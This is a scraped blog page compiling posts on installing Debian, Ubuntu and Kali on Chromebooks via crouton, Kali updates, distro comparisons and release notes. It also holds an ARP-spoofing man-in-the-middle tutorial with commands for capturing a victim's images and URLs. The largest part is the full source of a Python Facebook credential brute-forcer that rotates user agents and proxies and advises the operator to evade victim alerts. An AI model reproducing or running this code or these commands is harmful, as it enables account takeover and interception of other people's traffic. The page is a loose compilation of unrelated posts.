How to Install Debian on chromebook with crouton

What is Debian Linux and why do I want it on my Chromebook!

Debian on Chromebook

Debian is a Linux distribution comprised of open source software that is the bases of a large variety of Linux distribution. Kali, Ubuntu & Mint are a few examples of linux distors built on-top of Debian. Debian is also widely accepted as the solid linux.

How do I install it?

To install Debian on Chromebook you must be in developer mode. please reference the following page to learn how to enter  developer mode.

Once in developer mode you need to download crouton.

Open the crosh terminal (CTLR+ALT+T).

enter shell mode by typing shell / enter.

from shell type sh ~/Downloads/crouton -r debian -t kde -n debian

-r is the release. We need to set this to debian. If the -r switch is not passed Ubuntu will be installed.

-t is the target command that specifies what GUI interface you want installed by default. Gnome is the default gui for kali however it does not work on my HP Chromebook 14″. KDE works and is a  good alternative to Gnome.

-n is the name parameter. We define the -n switch here so we can give the chroot a custom name of debian.

As of this article I do not recommend gnome for the target gui on the HP Chromebook 14.

The process will run and install debian on the system.

at some point you will be prompted for a user name and password.

How do I start Debian on chromebook?

Once the install is complete from the shell type sudo startdebian. (This is also known as chroot)

this will start the Debian instance.

To transition seamlessly from chromeos and unity press CTRL+ALT+<=(backward) for chromeos and CTRL+ALT+=>(forward).

if the machine is rebooted you will have to enter shell and type sudo startdebian again.

it is possible to install multiple chroots.

Want to know more?

Read more

by Malik korrich ~ dimanche 29 mars 2015 0 commentaires

Turn Chromebook on Developer Mode

How do I turn on developer mode on a Chromebook?
Warning: Entering developer mode will wipe all data off of the SSD.

on a HP Chromebook  14″ With the machine booted Press ESC+REFRESH BUTTON + POWER at the same time.



The chromebook will reboot and you will be met with a message stating “ChromeOS is missing or not found”. Press CTL+D on the keyboard to skip this message. You will then be prompted by another message stating “To turn OS Verification off press enter”. Press ENTER. Your chromebook will then reboot, and prompt with a screen stating “OS Verification is off”. Press CTL+D to skip this message. You will then be prompted with a message “Your system is transitioning into developer mode. Local data has been cleared. Modifications you make to the system are not supported by Google, may cause hardware damage and may void your warranty. To cancel, turn your computer off now”. A timer is set in the top left hand corner of the screen to 30 seconds. Wait for the timer to reach 0. Once the timer has reached 0 you will be prompted with a new message “Preparing system for developer mode. This may take awhile. Do not turn your computer off until it restarts”. Wait for this process to complete; Once the process has complete the chromebook will reboot and you will be met with the message again “OS Verification is off”. Press CTL+D to skip this screen and boot the machine.

Chromebook OS Verification

Note: If you wish to restore your chromebook back to factory and re-wipe your data, reboot your chromebook and press space bar when the following message appears “OS Verification is off. Press space to re-enable”. Pressing space bar will reset your chromebook back to factory with OS verification back on.

Once the chromebook is in developer mode you will be able to take full advantage of the shell command. The shell command is access from the crosh terminal window.

To access the crosh terminal windows press CTLR+ALT+T on your keyboard.

Once open type shell and press enter. This puts you into a shell capable of some basic linux commands. This mode is also used for loading linux with the crouton script.

Read more

by Malik korrich ~ 0 commentaires

Install Ubuntu on a Chromebook

What is Ubuntu and why do I want it on my Chromebook!

Ubuntu is a linux distribution that is widely accepted as the most commonly installed linux distro. It is used as a alternative, althought not a direct replacement, for windows or Mac. Ubuntu extends the functionality of the chromebook, making the chromebook viable for developers, hackers, techies, and the common user.

Why not just install windows?

The underlying architecture from chrome os is strongly based on linux and Ubuntu. Although Im sure it is possible to install windows on a chromebook you would have the dual boot/chrooted awesomeness of both chromeOS and Ubuntu.

How do I install Ubuntu on a Chromebook?

To install Ubuntu on a chromebook it must be in developer mode. please reference the following page to learn how to enter  developer mode.

Once in developer mode you need to download crouton.

Open the crosh terminal (CTLR+ALT+T).

enter shell mode by typing shell / enter.

from shell type sh ~/Downloads/crouton -t unity

12.04 ubuntu is installed by default. You can switch the release of ubuntu by using the -r command.

-t is the target command that specifies what GUI interface you want installed by default. Unity is recommended by me out of the box for Ubuntu for two reasons.

 it works

 it is the default GUI installed when doing a fresh install of Ubuntu.

as of this article I do not recommend gnome for the target gui on the HP Chromebook 14.

The process will run and install ubuntu on the system.

at some point you will be prompted for a user name and password.

How do I start Ubuntu on a Chromebook?

Once the install is complete from the shell type sudo startunity. (This is also known as chroot)

this will start the unity instance.

To transition seamlessly from chromeos and unity press CTRL+ALT+<=(backward) for chromeos and CTRL+ALT+=>(forward).

if the machine is rebooted you will have to enter shell and type sudo startunity again.

Read more

by Malik korrich ~ 0 commentaires

How to install Kali Linux on HP Chromebook 14

Kali Linux
What is Kali Linux and why do I want it on my Chromebook!

Kali is a Linux distribution that is widely accepted as the Linux distribution for penetration testers, security experts and hackers. It is the successor to Backtrack Linux. Kali allows the user to install packages such as aircrack-ng and reaver to collect data on and hack into wireless networks.

How Do I Install Kali Linux on a Chromebook?
To install Kali on a Chromebook with crouton, the Chromebook must be in developer mode. please reference the following page to learn how to enter  developer mode.

Once in developer mode you need to download a special forked version of crouton. Kali has not yet been pulled into the master crouton project on github.

UPDATE: Kali has been added into the main crouton tree. You can download it here crouton.

Open the crosh terminal (CTLR+ALT+T).

enter shell mode by typing shell / enter.

from shell type sudo sh ~/Downloads/crouton -r kali -t kde -n kali

-r is the release. We need to set this to Kali. If the -r switch is not passed Ubuntu will be installed.

-t is the target command that specifies what GUI interface you want installed by default. Gnome is the default unity for kali however it does not work on my HP Chromebook 14″. KDE works and is a  good alternative to Gnome.

-n is the name parameter. We define the -n switch here so we can give the chroot a custom name of kali.

As of this article I do not recommend gnome for the target gui on the HP Chromebook 14.

The process will run and install kali on the system.

at some point you will be prompted for a user name and password.

How Do I Run Kali Linux on a Chromebook?
Once the install is complete from the shell type sudo startkde.

this will start the Kali instance.

To transition seamlessly from chromeos and unity press CTRL+ALT+<=(backward) for chromeos and CTRL+ALT+=>(forward).

if the machine is rebooted you will have to enter shell and type sudo startkde again.

Endless Possibilities:
it is possible to install multiple chroots.

Read more

by Malik korrich ~ 0 commentaires

Kali Linux tutorial on audits and hacking

The Kali Linux distribution is one of the most used Pentesting operating systems in the world, why? because it is loaded with a massive toolkit which allows you to perform audits and tests on a wide range of systems. This is exactly the reason why we decided to publish the perfect tutorial on using Kali Linux as a security audit tool. Kali Linux is a new distribution of the well known Backtrack series which get replaced by the Kali series the last year.

As you might have searched before there are various tutorials on the internet about how you can use Kali tools to perform security audits and pentests. A lot of these videos show you how a security expert is able to perform an specific attack on a specific device, but they do not show you how to setup such an attack on a target that you want to audit. The Kali linux tutorial will give you insight on how you need to target and audit your desired target.

What do you need to run Kali Linux

There are various ways on how you can use Kali Linux, for this tutorial we have chosen the virtual option of the Kali Linux distro as this is the most effective and managed way to use Kali Linux. We will be running the virtual environment with the VirtualBox application which can be downloaded for free from Oracle.

What do you need to download

As we mentioned above we are going to use the virtual option of the Kali Linux distro, so you will need the following files to make this work. Please install them in the specified order as your internet connection might be interrupted during the installation of the Oracle Virtualbox application.

1. Install Virtualbox and the dependencies
2. Wait for the installation of VirtualBox to complete
3. Once the installation has been completed, download your prefered Kali Linux versionfrom the official website

Once these steps have been completed you can continue to installing Kali Linux

Installing Kali Linux

As you now have installed the VirtualBox application, you will need to run the VirtualBox application and create a new virtual environment with the options that you desire. For our Kali Linux we decided to provide the following options:

1. 30GB harddisk space
2. NAT network
3. 4GB memory

Go ahead and select the downloaded ISO file and follow the full installation guide which is viewed during the installation of Kali Linux.

What kind of network will I operate in

In this Kali tutorial we chose the NAT network option, this means that you will be operating your Kali Linux environment on the same network which your ‘HOST’ is running. This is the computer where the Virtualbox application is installed.

How do I login on Kali Linux

Once the installation is completed you will be able to login to your Kali Linux environment with your provided credentials.

The default password of the Kali Linux system is:

1. username: “root”
2. password: “toor”

Logged in, and now what?

Now that you have logged in, continue and open the Terminal. Once the terminal is opened we will continue to provide two commands which will update and upgrade your Kali system to the latest version.

Provide the following commands in the Kali Linux environment:

• sudo apt-get update
• sudo apt-get upgrade

Start your audit

Now that you are running the latest version you can enter the next commands which will start the Armitage console for you. The armitage console is a GUI which uses the Metasploit database. The metasploit database is filled with exploits and scripts which you can use to audit your target.

The commands are:

• sudo service postgresql start
• sudo service metasploit start
• sudo armitage

Once you have entered the commands a new screen will open which will hold the Armitage console. In the Armitage console you will be able to scan domains and addresses. Once they have been scanned you will be able to audit them.

Read more

by Malik korrich ~ samedi 30 août 2014 0 commentaires

Kali Linux Man in the Middle Attack- Kali Linux Tutorial

Today our tutorial will talk about Kali Linux Man in the Middle Attack. How to perform man in the middle attack using Kali Linux?we will learn the step by step process how to do this.

I believe most of you already know and learn about the concept what is man in the middle attack, but if you still don't know about this, here is some definition from wikipedia.

The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.

Scenario:

This is the simple scenario, and I try to draw it in a picture.

Victim IP address : 192.168.8.90

Attacker network interface : eth0; with IP address : 192.168.8.93

Router IP address : 192.168.8.8

Requirements:

1. Arpspoof

2. Driftnet

3. Urlsnarf

Step by step Kali Linux Man in the Middle Attack :

1. Open your terminal (CTRL + ALT + T kali shortcut) and configure our Kali Linux machine to allow packet forwarding, because act as man in the middle attacker, Kali Linux must act as router between "real router" and the victim. Read the tutorial here how to set up packet forwarding in linux.

2. You can change your terminal interface to make the view much more friendly and easy to monitor by splitting kali linux terminal window.

3. The next step is setting up arpspoof between victim and router.

arpspoof -i eth0 -t 192.168.8.90 192.168.8.8

4. And then setting up arpspoof from to capture all packet from router to victim.

arpspoof -i eth0 192.168.8.8 192.168.8.90

5. After step three and four, now all the packet sent or received by victim should be going through attacker machine.

6. Now we can try to use driftnet to monitor all victim image traffic. According to its website,

Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.

7. To run driftnet, we just run this

driftnet -i eth0

When victim browse a website with image, driftnet will capture all image traffic as shown in the screenshot below.

To stop driftnet, just close the driftnet window or press CTRL + C in the terminal

8. For the next step we will try to capture the website information/data by using urlsnarf. To use urlsnarf, just run this code

urlsnarf -i eth0

and urlsnarf will start capturing all website address visited by victim machine.

9. When victim browse a website, attacker will know the address victim visited.

Here is the video in case you can't get the text explanations above.

Conclusion:

1. To change or spoof the attacker MAC address, you can view the tutorial about how to change kali linux MAC address.

2. Driftnet or Urlsnarf was hard to detect, but you can try to find the device in your network with promiscious mode which have possibliity to sniff the network traffic.

Hope you found it useful 

- See more at: http://www.hacking-tutorial.com/hacking-tutorial/kali-linux-man-middle-attack/#sthash.p8piGoyv.dpuf

Read more

by Malik korrich ~ 0 commentaires

[PYTHON] Facebook Pentester 2014 by mauritania attacker

                FACEBOOK PENTESTER 2014 BY MAURITANIA ATTACKER

Create a Dir and place it in C:\ and place also this python script inside it and create a text file , wordlist pass must be in this form:

Target@facebook.com::password
Target@facebook.com::12345
Target@facebook.com::123456
Target@facebook.com::1234567
Target@facebook.com::pa$$w0rd
Target@facebook.com::12345678
Target@facebook.com::123456789
Target@facebook.com::1216565
Target@facebook.com::214548554
Target@facebook.com::5463513
Target@facebook.com::45453452

Like Combo Attack Old School ^_^ and run script from cmd \!/ good chance




#!/usr/bin/python
#Facebook Pentester 2014 can crack into Facebook Id's 100% without Interruption By Facebook Firewall !
#This program is for sale & the objectif of this product is only for educational purposes only.
#Changing Description of this Script won't make you the coder ^_^ !
#Don't Crack people facebook account's it's illegal !
#If you want to crack into someone's account, you must have the permission of the user.
#Mauritania Attacker is not responsible.

import re
import os
import sys
import random
import warnings
import time
try:
        import mechanize
except ImportError:
        print "[*] Please install mechanize python module first"
        sys.exit(1)
except KeyboardInterrupt:
        print "\n[*] Exiting program...\n"
        sys.exit(1)
try:
        import cookielib
except ImportError:
        print "[*] Please install cookielib python module first"
        sys.exit(1)
except KeyboardInterrupt:
        print "\n[*] Exiting program...\n"
        sys.exit(1)

warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)

# define variable
__Script__   = "Facebook Pentester 2014 Priv8888!"
__Released__ = "27/01/2014 By Mauritania Attacker"
__moi__  = "Facebook Checkpoint Security Bypassed 100%"
verbose         = False
useproxy        = False
usepassproxy    = False
log             = 'ghost.log'
file            = open(log, "a")
success         = 'home_edit_profile'
checkpoint      = 'checkpoint'
oldpass         = 'You entered an old password'
fblogin         = 'https://login.facebook.com/login.php?login_attempt=1'
# some priv8 useragents for Facebook Security !
useragent    = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
                'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
                'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
                'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
                'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
                'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
                'Microsoft Internet Explorer/4.0b1 (Windows 95)',
                'Opera/8.00 (Windows NT 5.1; U; en)',
                'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
                'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
                'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
                'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
                'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
                'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
                ]
facebook        = '''

#Facebook Pentester 2014 Priv8.
#Coded By Mauritania Attacker.
#Features: Verbose Method + Intrusion.
#Details: Pentest Facebook Accounts + Anonymous Fast Proxy Undetectable.

Script : %s
New Security Bypass : %s
Released    : %s''' % (__Script__, __moi__, __Released__)
option          = '''
Usage  : %s -w pentest.txt
Option : -w, --wordlist               |   Wordlist used for Cracking
         -v, --verbose                          |   Set %s will be verbose
         -p, --proxy                 |   Set http proxy will be use
         -k, --usernameproxy          |   Set username at proxy will be use
         -i, --passproxy              |   Set password at proxy will be use
         -l, --log                    |   Specify output filename (default : ghost.log)
         -h, --help                       |   Print this help

Example : %s -w pentest.txt"

P.S : add "&" to run in the background
''' % (sys.argv[0], sys.argv[0], sys.argv[0])
hme             = '''
Usage : %s -w pentest.txt
        -h or --help for get help
        ''' % sys.argv[0]

def helpme():
        print facebook
        print option
        file.write(facebook)
        file.write(option)
        sys.exit(1)

def helpmee():
        print facebook
        print hme
        file.write(facebook)
        file.write(hme)
        sys.exit(1)

for arg in sys.argv:
        try:
                if arg.lower() == '-u' or arg.lower() == '--user':
                        username = sys.argv[int(sys.argv[1:].index(arg))+2]
                elif arg.lower() == '-w' or arg.lower() == '--wordlist':
                        wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
                elif arg.lower() == '-l' or arg.lower() == '--log':
                        log = sys.argv[int(sys.argv[1:].index(arg))+2]
                elif arg.lower() == '-p' or arg.lower() == '--proxy':
                        useproxy = True
                        proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
                elif arg.lower() == '-k' or arg.lower() == '--userproxy':
                        usepassproxy = True
                        usw = sys.argv[int(sys.argv[1:].index(arg))+2]
                elif arg.lower() == '-i' or arg.lower() == '--passproxy':
                        usepassproxy = True
                        usp = sys.argv[int(sys.argv[1:].index(arg))+2]
                elif arg.lower() == '-v' or arg.lower() == '--verbose':
                        verbose = True
                elif arg.lower() == '-h' or arg.lower() == '--help':
                        helpme()
                elif len(sys.argv) <= 1:
                        helpmee()
        except IOError:
                helpme()
        except NameError:
                helpme()
        except IndexError:
                helpme()

def bruteforce(word):
        try:
                pos = word.find("::")
                userEmail = word[0:pos]
                word = word[pos+len("::"):len(word)]
              
                print("userEmail: " + userEmail )
                print("password: " + word )
                file.write("[*] Trying " + userEmail + "::" + word + "\n" )
                sys.stdout.flush()
                rch = random.choice(useragent)
                br.addheaders = [('User-agent', rch)]
                # print("User Agent: " + rch )
                opensite = br.open(fblogin)

                # To show and print all forms name
                # for form in br.forms():
                #      print "Form name:", form.name
                #      print form

                # To show all control elements in the form
                # br.form = list(br.forms())[0]
                # for control in br.form.controls:
                #      print control
                #      print "type=%s, name=%s value=%s" % (control.type, control.name, br[control.name])

                # To dump cookies data being sent and received
                # dump();

                # Release email account from autotext fill
                # If email still auto-filled on login form, this script would not work as expected, so we need to release it

                NotMe = "notme_cuid"
                for link in br.links():
                        if (NotMe in link.url):
                                request = br.click_link(link)
                                response = br.follow_link(link)
                                # print response.geturl()

                br.select_form(nr=0)

                br.form = list(br.forms())[0]
                br.form['email'] = userEmail
                br.form['pass'] = word
                br.submit()
                response = br.response().read()

                if verbose:
                        print response
                if success in response:
                        print "\n\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/"
                        print "[*] userEmail : %s" % (userEmail)
                        print "[*] Password : %s\n" % (word)
                        file.write("\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/")
                        file.write("\n[*] userEmail : %s" % (userEmail))
                        file.write("\n[*] Password : %s\n\n" % (word))

                        # After the successful login, force to Logout (to clear the cookies & the session - Very important!)
                        for form in br.forms():
                                if form.attrs['id'] == 'logout_form':
                                        br.form = form
                                        br.submit()
                elif checkpoint in response:
                        print "\n\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/"
                        print "[*] userEmail : %s" % (userEmail)
                        print "[*] Password : %s\n" % (word)
                        file.write("\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/")
                        file.write("\n[*] userEmail : %s" % (userEmail))
                        file.write("\n[*] Password : %s\n\n" % (word))

                        # In checkpoint, this account maybe has been logged in, so we need to Log it Out after the successful login
                        LogOut = "logout.php"
                        for link in br.links():
                                if (LogOut in link.url):
                                        request = br.click_link(link)
                                        response = br.follow_link(link)
                                        # print response.geturl()
                                        # print "This account has been logged out"
                                # else:
                                #        print "Can not click Log Out link"
                      
        except KeyboardInterrupt:
                print "\n[*] Exiting program...\n"
                sys.exit(1)
        except mechanize._mechanize.FormNotFoundError:
                print "\n[*] Form Not Found\n"
                file.write("\n[*] Form Not Found\n")
                sys.exit(1)
        except mechanize._form.ControlNotFoundError:
                print "\n[*] Control Not Found\n"
                file.write("\n[*] Control Not Found\n")
                sys.exit(1)

# Priv8 Function to Dump Cookies Data
# def dump():
#       for cookie in cj:
#               print cookie.name, cookie.value

def releaser():
        global word
        for word in words:
                bruteforce(word.replace("\n",""))

def main():
        global br
        global words
        # Priv8 Function to enable dump()
        # global cj
        try:
                br = mechanize.Browser()
                cj = cookielib.LWPCookieJar()
                br.set_cookiejar(cj)
                br.set_handle_equiv(True)
                br.set_handle_gzip(True)
                br.set_handle_redirect(True)
                br.set_handle_referer(True)
                br.set_handle_robots(False)
                br.set_debug_http(False)
                br.set_debug_redirects(False)
                br.set_debug_redirects(False)
                br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
                if useproxy:
                        br.set_proxies({"http": proxy})
                if usepassproxy:
                        br.add_proxy_password(usw, usp)
                if verbose:
                        br.set_debug_http(True)
                        br.set_debug_redirects(True)
                        br.set_debug_redirects(True)
        except KeyboardInterrupt:
                print "\n[*] Exiting program...\n"
                file.write("\n[*] Exiting program...\n")
                sys.exit(1)
        try:
                preventstrokes = open(wordlist, "r")
                words          = preventstrokes.readlines()
                count          = 0
                while count < len(words):
                        words[count] = words[count].strip()
                        count += 1
        except IOError:
                print "\n[*] Error: Check your config path\n"
                file.write("\n[*] Error: Check your config path\n")
                sys.exit(1)
        except NameError:
                helpme()
        except KeyboardInterrupt:
                print "\n[*] Exiting program...\n"
                file.write("\n[*] Exiting program...\n")
                sys.exit(1)
        try:
                print facebook
                print "\n[*] Starting Cracking at %s" % time.strftime("%X")
                #print "[*] Account To Crack %s" % (username)
                print "[*] Loaded :",len(words),"words"
                print "[*] Cracking, please wait..."
                file.write(facebook)
                file.write("\n[*] Starting Cracking at %s" % time.strftime("%X"))
                #file.write("\n[*] Account To Crack %s" % (username))
                file.write("\n[*] Loaded : %d words" % int(len(words)))
                file.write("\n[*] Cracking, please wait...\n")
        except KeyboardInterrupt:
                print "\n[*] Script Closed...\n"
                sys.exit(1)
        try:
                releaser()
                bruteforce(word)
        except NameError:
                helpme()

if __name__ == '__main__':
        main()

...Mauritania attacker...
meet hackers
www.meethackers.com

Read more

by Malik korrich ~ samedi 28 juin 2014 0 commentaires

How to Hack facebook using set ettercap with Kali Linux Tuturoial

Hello Guys In this tutorail i am giong to show to how to hack facebook with the use of Set Ettercap With Kali Linux

Read more

by Malik korrich ~ lundi 26 mai 2014 0 commentaires

Kali Linux vs BackBox

We blog a lot on Linux pentesting distros (here’s our top-ten list) and it was really a question of time before we wrote this particular post comparing these two popular Linux distros.

Kali Linux vs BackBox is essentially an exercise, in our opinion, of comparing Ubuntu (which BackBox is based on) to Debian (which Kali Linux is based upon). We need to set the record straight now because we are massive BackBox fans. We run several machines (hard booted) in the office and are very happy with it. Our personal story is that we used to run BackTrack back in the day but we became very impatient with a few nagging issues that we always had, mostly with drivers not working and tools not being updated correctly. We switched to BackBox just prior to the Kali Linux launch and never really left BackBox. So with that being said, yes, we are biased but, we also know of course that Kali has a massive following and popularity base so clearly the guys at Offensive Security (the people behind the distro) have done a great job.

So why this post? 
In May 14 of this year we posted a poll titled: “Vote for your favorite Linux Penetration Testing Distribution” and, several months later, and 317 votes later (as of July 28th 2013) we are really happy to see that BackBox is not that far behind Kali – which is really encouraging considering the massive fan base that Kali Linux enjoys.

Here are the results of the poll so far, (by the way you can still vote if you want, voting will remain open – forever!)

---

84% voted for Kali Linux Pentesting Hacking Distro

84% Prefer Kali Linux

77% voted for BackBox Pentesting Hacking Distro

77% Prefer BackBox

7% voted for Bugtraq

60% Complete (warning)

---

Click here to place your vote!

• Kali Linux
• BackBox
• Knoppix STD
• Pentoo
• DEFT
• CAINE
• Samurai Web Testing Framework
• Matriux Krypton
• WEAKERTH4N
• Bugtraq
• NodeZero
• Fedora Security Spin

---

So why one over the other?
The choice really shouldn’t be that difficult because essentially they all do the same thing. In fact we’d really like to hear your comments below because we bet you have the same reasons as us, i.e. you just fell into a distro and that was that. Most of our Hacker Hotshot speakers tend to favor Kali, it is a question that we often ask them because a lot of their research is conducted from Linux Operating Systems and Distros.

Drivers, and the support that the developers give to ensuring drivers work, is clearly a motivating factor to why you might chose one pentesting distro over another, and again, this is what made us switch from BackTrack to BackBox. However, in our opinion – here is the biggest reason why someone would prefer one over the other, and that reason is support. The support that Offensive Security can afford to give to Kali is huge. Their forum is huge and as a result there is a lot of answered questions to ‘common’ problems. So, if you are new to the scene and are having trouble with a particular security tool, install, or whatever – then fear not, someone over at Kali will assist.

In our opinion the fine folks over at BackBox headed by community leader ZEROF are a more friendly bunch and more n00b friendly than any other pentesting forum.

Also, it’s worth mentioning here that BackBox is a very Italian affair. Many of the community members are Italian and Founder Raffaele Forte along with Repository Maintainer Alessio Pascolini, we think, judging by their names, are also Italian. Just a side note, but we have noticed other hacking and forensics/ pentesting/ security distros hailing from Italy – not sure why that is but anyway here are another two from Italy: CAINE and we think also DEFT8?

Anyway – the main point we are making here is that of support. No support makes life difficult. We prefer the slightly more user-friendly and helpful support from BackBox, but if you like mass appeal then Kali is your new friend.

Which has the most tools?
Well, rather than re-invent the wheel – here is an exhaustive list of security tools that are contained within Kali Linux and trust me on this, there are enough here for you to be getting on with. The latest version of BackBox 3.05 has new and updated hacking tools (that include automater, inundator, ettercap, wireshark, se-toolkit, metasploit, sqlmap, beef, weevely, thc-ipv6, truecrack, hashcat, and more).

We do not know if there are any ‘missing tools’ in either distro and to do a comparison would take rather a long time, but please let us know in the comments below if you have ever come across a pentesting tool that you think ought to be in either one of the distros.

Sidenote, if WireShark is your thing then come and join us July 31st at 1200 EST for a: How to Hack VoIP (and defend your netowrk!) using WireShark. Also – on the subject of hacking tools you might like this post, “On My Command. Unleash Hell! The Black Hat Arsenal 2013!”.

Quick Summary: Kali Linux

• OS Type: Linux
• Based on: Debian
• Version 1.0
• Origin: USA
• Architecture: i386, x86_64, ARM
• Desktop: Gnome, KDE, XFCE

Quick Summary: BackBox

• OS Type: Linux
• Based on: Debian, Ubuntu
• Version 3.05
• Origin: Italy
• Architecture: i386, x86_64
• Desktop: XFCE

In summary
We are totally biased to BackBox and for that we reason we need your input! Please leave a comment below and let us know your favorite Linux pentesting distro! Our voting will remain open throughout 2013 giving you a chance to cast your all important ballot! Vote on your favorite distro here!

Our decision to switch to Backbox came on the back of a buggy BackTrack 3 and 4, and the fact that BackBox with XFCE was lightning fast and, frankly, we have never had an issue with the distro.

What’s yours?

Read more

by Malik korrich ~ samedi 24 mai 2014 0 commentaires

How To Update Kali Linux

 Kali Linux’s Penetration testing system requires constant updating to keep the tools in functional order. This short tutorial will show you the command to update the tools and system.

---

Step One:

Start Kali Linux and open a terminal.




Step Two:


Type apt-get update && apt-get upgrade (without quotes) in the terminal and hit Enter.

---

     Kali will now check it’s webservers for updates. If there are any, it will ask you if you want to install them, hit Enter for yes. It’s hard to remember that long command at first, so I suggest checking out my post on how to create Permanent Aliases In Kali Linux.

Thank you!

Read more

by Malik korrich ~ 0 commentaires

Kali Linux

Kali Linux is a GPL-compliant Linux distribution built by penetration testers for penetration testers with development staff consisting of individuals spanning different languages, regions, industries, and nationalities. The evolution of Kali took place over many years of development, penetration tests, and unprecedented help from the security community. Kali Linux originally started with earlier versions of live Linux distributions called BackTrack, Whoppix, IWHAX, and Auditor.

When it was initially developed, Kali was designed to be an all-in-one live CD to be used on security audits and was specifically crafted to not leave any remnants of itself on the system. With millions of downloads, it has become the most widely adopted penetration testing framework in existence and is used by the security community all over the world.

Read more

by Malik korrich ~ 0 commentaires

Distribution Release: Kali Linux 1.0.4

Devon Kearns has announced the release of Kali Linux 1.0.4, an updated version of the Debian-based distribution (formerly known as BackTrack Linux) that features an extensive collection of security and forensics tools: "In keeping with our tradition of publishing new releases during the annual Black Hat and DEF CON conferences, we are pleased to announce the availability of Kali Linux 1.0.4. The last few months since the initial release of Kali have seen a large number of changes, upgrades, and improvements in the distribution, all of which are included in version 1.0.4. Thanks to numerous requests from the Kali Linux community on the Kali Bug Tracker, we have added many new tools to Kali’s arsenal. Our quest to get Kali Linux running on popular ARM hardware is going strong and our trusted contributor, Offensive Security, has provided new ARM images for the BeagleBone Black, CuBox and Efika MX to our growing collection." Read the release announcement for further details.Download: kali-linux-1.0.4-amd64.iso (2,345MB, SHA1, torrent).

Recent Related News  • 2014-01-09: Distribution Release: Kali Linux 1.0.6  • 2013-07-26: Distribution Release: Kali Linux 1.0.4  • 2013-03-14: Distribution Release: Kali Linux 1.0  • 2012-08-13: Distribution Release: BackTrack 5 R3  • 2012-03-02: Distribution Release: BackTrack 5 R2  • 2011-08-23: Distribution Release: BackTrack 5 R1  • More Kali news...

About Kali
Kali Linux (formerly known as BackTrack) is a Debian-based distribution with a collection of security and forensics tools. It features timely security updates, support for the ARM architecture, a choice of four popular desktop environments, and seamless upgrades to newer versions.

Kali Summary
Distribution	Kali Linux (formerly BackTrack)
Home Page	http://www.kali.org/
Mailing Lists	--
User Forums	http://forums.kali.org/
Documentation	http://www.kali.org/official-documentation/
Screenshots	LinuxScreenshots.org
Download Mirrors	http://www.kali.org/downloads/
Bug Tracker	http://bugs.kali.org/
Related Websites	Offensive Security • Wikipedia
Reviews	1.0: Binary Tides • LinuxBSDos BackTrack: LinuxBSDos • ADMIN • Ubuntu Manual • Linux User • Dedoimedo • Br4v3-H34r7 (Arabic) •Linux.com • Linux.com
Where To Buy	(sponsored link)

Screenshots

Recent Related News
2014-01-09 Distribution Release: Kali Linux 1.0.6 Mati Aharoni has announced the release of Kali Linux 1.0.6, an updated version of the project's Debian-based distribution with a large collection of tools for penetration testing and forensic analysis: "Kali Linux 1.0.6 released. It has been a while since our last minor release which makes 1.0.6 a more significant update than usual. With a new 3.12 kernel, a LUKS nuke feature, new Kali ARM build scripts, and Kali AMAZON AMI and Google Compute image generation scripts, not to mention numerous tool additions and updates – this release is really heavily laden with goodness. This new release brings with it the introduction of the Offensive Security Trusted ARM image scripts – a set of slowly growing scripts that are able to build Kali Linux images for various ARM devices. These scripts will replace the growing number of actual ARM image releases we have in order to reduce the exponentially growing amount of traffic we serve on each release." See the detailed release announcement for more information and useful links. Download: kali-linux-1.0.6-amd64.iso (2,993MB, SHA1,torrent).
2013-03-14 Distribution Release: Kali Linux 1.0 Offensive Security has announced the release of Kali Linux 1.0, a Debian-based distribution with a collection of security tools for forensic analysis and penetration testing. This is a major new update of the project's flagship distribution formerly known as BackTrack (based on Ubuntu). From the release announcement: "After a year of silent development, Offensive Security is proud to announce the release and public availability of 'Kali Linux', the most advanced, robust, and stable penetration-testing distribution to date. Kali is a more mature, secure, and enterprise-ready version of BackTrack. Trying to list all the new features and possibilities that are now available in Kali would be an impossible task on this single page. We therefore invite you to visit our new Kali Linux website and Kali Linux documentation site to experience the goodness of Kali for yourself." Quick download link: kali-linux-1.0-amd64.iso (2,088MB, SHA1, torrent).
